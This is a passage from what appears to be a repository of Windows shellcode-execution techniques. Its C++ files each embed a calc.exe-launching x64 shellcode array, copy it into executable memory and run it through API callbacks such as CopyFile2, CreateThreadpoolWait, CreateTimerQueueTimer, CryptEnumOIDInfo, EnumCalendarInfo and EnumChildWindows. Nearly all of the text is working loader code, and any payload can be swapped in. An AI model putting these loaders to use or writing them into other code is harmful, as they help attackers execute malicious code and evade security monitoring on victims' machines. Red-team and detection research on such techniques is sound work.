"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 20 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 21 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 22 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 23 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 24 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 25 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 26 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 27 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 28 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 29 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 30 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 31 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 32 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 33 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 34 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 35 | "\x63\x2e\x65\x78\x65\x00"; 36 | 37 | 38 | 39 | int main() { 40 | 41 | 42 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 43 | ::RtlMoveMemory(addr, op, sizeof(op)); 44 | 45 | COPYFILE2_EXTENDED_PARAMETERS params; 46 | 47 | params.dwSize = { sizeof(params) }; 48 | params.dwCopyFlags = COPY_FILE_FAIL_IF_EXISTS; 49 | params.pfCancel = FALSE; 50 | params.pProgressRoutine = (PCOPYFILE2_PROGRESS_ROUTINE)addr; 51 | params.pvCallbackContext = nullptr; 52 | 53 | ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log"); 54 | ::CopyFile2(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", ¶ms); 55 | 56 | } -------------------------------------------------------------------------------- /Shellcode Execution/CopyFile2/CopyFile2.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 
{4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CopyFileEx/CopyFileEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | int main() { 29 | 30 | 31 | LPVOID addr 
= ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | ::RtlMoveMemory(addr, op, sizeof(op)); 33 | 34 | ::DeleteFileW(L"C:\\Windows\\Temp\\backup.log"); 35 | ::CopyFileExW(L"C:\\Windows\\DirectX.log", L"C:\\Windows\\Temp\\backup.log", (LPPROGRESS_ROUTINE)addr, NULL, FALSE, COPY_FILE_FAIL_IF_EXISTS); 36 | 37 | } -------------------------------------------------------------------------------- /Shellcode Execution/CopyFileEx/CopyFileEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CreateThreadPoolWait/CreateThreadPoolWait.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // This technique was developed by alfarom256 please check out his awesome work! 
6 | 7 | #define LEN 277 8 | 9 | // run calc 10 | unsigned char op[] = 11 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 12 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 13 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 14 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 15 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 16 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 17 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 18 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 19 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 20 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 21 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 22 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 23 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 24 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 25 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 26 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 27 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 28 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 29 | "\x63\x2e\x65\x78\x65\x00"; 30 | 31 | 32 | int main() 33 | { 34 | HANDLE hEvent; 35 | hEvent = CreateEvent(NULL, FALSE, FALSE, NULL); 36 | 37 | 38 | 39 | /* 40 | Can just shove a payload in RX mem and cast it to PTP_WAIT_CALLBACK 41 | ¯\_(ツ)_/¯ 42 | */ 43 | 44 | LPVOID addr = VirtualAlloc(NULL, LEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 45 | RtlMoveMemory(addr, op, LEN); 46 | DWORD old; 47 | 48 | 49 | if (!VirtualProtect(addr, LEN, PAGE_EXECUTE_READ, &old)) 50 | printf("%d", GetLastError()); 51 | 52 | PTP_WAIT ptp_w = CreateThreadpoolWait((PTP_WAIT_CALLBACK)addr, NULL, NULL); 53 | 54 | 55 | SetThreadpoolWait(ptp_w, hEvent, 0); 56 | 57 | // need to send events so the Threadpool Wait Callback 
has a chance to "catch" them and run 58 | SetEvent(hEvent); 59 | WaitForThreadpoolWaitCallbacks(ptp_w, FALSE); 60 | SetEvent(hEvent); 61 | while (TRUE) 62 | { 63 | Sleep(9000); 64 | } 65 | 66 | 67 | } -------------------------------------------------------------------------------- /Shellcode Execution/CreateThreadPoolWait/CreateThreadPoolWait.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | // alfarom256 calc shellcode 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 
19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | ::RtlMoveMemory(addr, op, sizeof(op)); 34 | 35 | 36 | 37 | HANDLE timer; 38 | HANDLE queue = ::CreateTimerQueue(); 39 | HANDLE gDoneEvent = ::CreateEvent(NULL, TRUE, FALSE, NULL); 40 | if (!::CreateTimerQueueTimer(&timer, queue, (WAITORTIMERCALLBACK)addr, NULL, 100, 0, 0)) { 41 | 42 | printf("Fail"); 43 | } 44 | 45 | if (::WaitForSingleObject(gDoneEvent, INFINITE) != WAIT_OBJECT_0) 46 | printf("WaitForSingleObject failed (%d)\n", GetLastError()); 47 | } -------------------------------------------------------------------------------- /Shellcode Execution/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, 
"Crypt32.lib") 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | memcpy(address, &op[0], sizeof(op)); 37 | 38 | 39 | CryptEnumOIDInfo(NULL, NULL, NULL, (PFN_CRYPT_ENUM_OID_INFO)address); 40 | 41 | 42 | return 0; 43 | 44 | } -------------------------------------------------------------------------------- /Shellcode Execution/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | 
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumCalendarInfo/EnumCalendarInfo.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // alfarom256 calc shellcode 4 | unsigned char op[] = 5 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 6 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 7 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 8 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 9 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 10 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 11 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 12 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 13 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 14 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 15 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 16 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 17 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 18 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 19 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 20 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 21 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 22 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 23 | "\x63\x2e\x65\x78\x65\x00"; 24 | 25 | 26 | int main() { 27 | LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, 
PAGE_EXECUTE_READWRITE); 28 | ::RtlMoveMemory(addr, op, sizeof(op)); 29 | ::EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1); 30 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumCalendarInfoEx/EnumCalendarInfoEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // alfarom256 calc shellcode 4 | unsigned char op[] = 5 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 6 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 7 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 8 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 9 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 10 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 11 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 12 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 13 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 14 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 15 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 16 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 17 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 18 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 19 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 20 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 21 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 22 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 23 | "\x63\x2e\x65\x78\x65\x00"; 24 | 25 | 26 | int main() { 27 | LPVOID addr = ::VirtualAlloc(nullptr, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 28 | ::RtlMoveMemory(addr, op, sizeof(op)); 29 | ::EnumCalendarInfoEx((CALINFO_ENUMPROCEX)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, 
CAL_SMONTHNAME1); 30 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumChildWindows/EnumChildWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | ::EnumChildWindows(NULL, (WNDENUMPROC)addr, NULL); 44 | 45 | 46 | } 
-------------------------------------------------------------------------------- /Shellcode Execution/EnumChildWindows/EnumChildWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumDesktopW/EnumDesktopW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | 14 | // alfarom256 calc shellcode 15 | unsigned char op[] = 16 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 17 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 18 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 19 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 20 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 21 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 22 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 23 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 24 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 25 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 26 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 27 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 28 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 29 | 
